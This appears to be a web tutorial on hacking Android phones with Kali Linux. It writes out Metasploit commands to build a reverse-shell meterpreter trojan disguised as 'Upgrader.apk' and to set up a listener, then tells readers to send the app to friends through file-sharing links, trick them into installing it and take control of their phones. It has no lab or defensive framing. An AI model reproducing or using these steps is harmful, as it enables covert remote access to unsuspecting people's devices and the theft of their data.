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How to Hack Android Using Kali

Direct DownloadLinkIn this Tutorial You will be guided How to Hack Android Using Kali. This a completely noob friendly tutorial . With Pics in each steps.All that u need is just Kali Linux installed in your PC and a droid to hackStep 1: Fire-Up Kali:*.Open a terminal, and make aTrojan.apk*.You can do this by typing :*.msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk(replace LHOST with your own IP)*.You can also hack android onWAN i.e. throughInteretby using yourPublic/External IPin the LHOST and byport forwardingStep 2: Open Another Terminal:*.Open another terminal until the file is being produced.*.Load metasploit console, by typing :msfconsoleStep 3: Set-Up a Listener:*.After it loads(generally takes some time), load the multi-handler exploit by typing :use exploit/multi/handler*.Set up a (reverse) payload by typing :set payload android/meterpreter/reverse_tcp*.To set L host type :set LHOST 192.168.0.4(Even if you are hacking on WAN type your private/internal IP here not the public/external)Step 4: Exploit!*.At last type:exploitto start the listener.*.Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.*.Then send it using Uploading it to Dropbox or any sharing website (like:http://www.speedyshare.com).*.Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)*.Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)*.However, the option of allowance for Installation of apps fromUnknown Sourcesshould beenabled(if not) from the security settings of the android phone to allow the Trojan to install.*.And when he clicks Open…Step 5: BOOM!There comes the meterpreter prompt:Download

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